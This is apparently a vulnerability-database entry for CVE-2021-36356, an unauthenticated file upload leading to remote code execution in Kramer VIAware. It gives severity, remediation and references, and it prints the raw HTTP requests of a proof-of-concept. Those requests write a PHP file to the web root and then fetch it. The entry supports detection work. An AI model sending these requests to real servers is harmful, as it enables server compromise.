🔙 목록으로 돌아가기

CVE-2021-36356: Kramer VIAware - Remote Code Execution

TitleKramer VIAware - Remote Code Execution
Authorgy741
SeverityCritical
ImpactUnauthenticated attackers can upload arbitrary PHP files to the web root, achieving remote code execution and complete server compromise.
RemediationApply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface.
CVSS Score9.8
EPSS Score0.91156
CVE IDCVE-2021-36356
CWE IDCWE-434
Tags cve2021 cve viaware kramer edb rce intrusive kramerav vkev vuln

🔍 Vulnerability Description

KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.

🌐 HTTP Request

POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.7
Connection: close
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

radioBtnVal=%3C%3Fphp+echo+md5%28%22CVE-2021-35064%22%29%3B+%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F38FLmXeCNuMSlKhIWqfdx44O82u.php
GET /38FLmXeCNuMSlKhIWqfdx44O82u.php' HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-36356.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-36356.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A